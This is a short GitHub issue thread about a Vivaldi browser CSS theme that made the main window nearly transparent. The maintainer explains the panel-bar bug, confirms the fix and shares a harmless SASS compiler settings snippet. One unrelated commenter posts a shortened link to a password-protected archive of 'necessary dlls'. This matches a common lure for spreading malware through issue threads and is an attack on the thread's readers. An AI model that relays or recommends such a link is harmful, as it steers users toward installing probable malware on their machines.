### ISSUE TITLE
Main window is almost entirely transparent

### ISSUE THREAD

**Issue by CDezia** [shaneburns/vivaldi-mods#1]
Freshly loaded the cloned repo and the main window was almost transparent. I'd try to modify the .css myself, but it's a bit unruly since it's all a single line. First time opening an issue but I like the idea of this theme a lot, so I decided to give it a shot.

Vivaldi 6.9.3447.46, Windows 10

![image](https://github.com/user-attachments/assets/65bb65ff-7e4f-47aa-9cbc-e5cb6e8a8e10)

**Comment by d-dvorkin** [comment]
maybe this will help
https://bit.ly/3TC7hrw
Archive codepass: changeme
I put the necessary dlls in the archive

**Comment by shaneburns** [comment]
TL;DR You're good to fetch & pull the repo and (while the custom CSS location is set) restart Vivaldi!

Thanks for checking this out, @CDezia! And thanks even more so for opening an issue; this is my first handling an issue on my own project, so I'm glad we get to experience it together!  I'll refrain from making a Madonna joke, haha.  

This was a bug that occurs when the panel bar is toggled off; I've never had the panel toggled off for very long just out of preference so that config slipped past my testing.  Big props again for catching this, and I hope you get some enjoyment out of it!

Long P.S. 

Just in case you wanted to poke around the styles, I've got .sass files in the `styles/` folder; or if you're more comfortable with pure CSS and have vscode, you can use the Live SASS Compiler extension and update the `settings.json` file in the `.vscode/` folder as such:

```
{
    "liveSassCompile.settings.formats": [
        {
            "format": "expanded",
            "extensionName": ".css",
            "savePath": "/",
            "savePathReplacementPairs": null
        }
    ],
}
```

Start 'Watching' and it will regenerate the styles expanded out.  Happy coding :)
